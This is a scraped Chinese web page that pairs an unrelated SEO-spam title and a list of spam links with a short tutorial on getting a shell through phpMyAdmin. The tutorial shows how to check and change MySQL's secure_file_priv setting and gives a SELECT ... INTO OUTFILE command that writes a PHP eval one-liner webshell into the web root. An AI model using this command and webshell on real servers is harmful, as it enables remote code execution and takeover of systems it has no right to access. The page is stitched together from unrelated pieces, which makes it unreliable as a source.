当前位置: 首页 > news >正文

网站建设需要哪些工作html网页制作代码作业

网站建设需要哪些工作,html网页制作代码作业,wordpress建站教程阿里云,网页设计代码大全div0x00 前言 来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file…

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

http://www.yayakq.cn/news/157127/

相关文章:

  • 如何做简易网站wordpress 中文社区
  • 罗源网站建设泉州网站制作哪个好薇
  • 网页设计与制作专业优化官方网站设计
  • 贵州萝岗seo整站优化新手如何做外贸生意
  • 网站换模板对seo外贸网站的特色
  • 网站建设制作优帮云仿做网站
  • wordpress 导入网站html5网站开发demo
  • 浙江建设厅网站官网专业建设外贸网站制作江门
  • 网站优化推广多少钱民制作网站价格
  • 自己做网站怎么连接外网电子商务网站后台核心管理
  • 网站开发工作要求番禺建设网站报价
  • 长沙网站提升排名媒体发稿公司
  • dede网站源码谷歌搜索引擎入口google
  • 网站栏目建设调研用境外服务器做网站
  • 凯里市住房和城乡建设局网站住建局网站官网
  • 泰安市网站建设公司公司邮箱在哪里找
  • 小地方网站建设公司网站安全检测网站
  • 网站建设零金手指专业分类信息网站怎么做
  • 优门设 网站关于建设网站的情况说明
  • 镇江网站设计单位不能建设网站
  • 泉州做网站排名我市精神文明建设的门户网站
  • 大学生做外包项目的网站网站建设的理念
  • 运营公开网是什么网站如何知道网站的字体
  • 电子商务网站建设论文摘要wordpress 加载数据库表格也卖弄
  • 国外网站大全帝国cms模板电子商务网站开发与实现
  • 土石方工程网站电子请柬制作软件app
  • 网站开发交什么税微网站开发需要多少钱
  • 做付费网站好有没有专门做装修的网站
  • 做网站先学什么房地产 东莞网站建设
  • 医院网站建设作用中山网站seo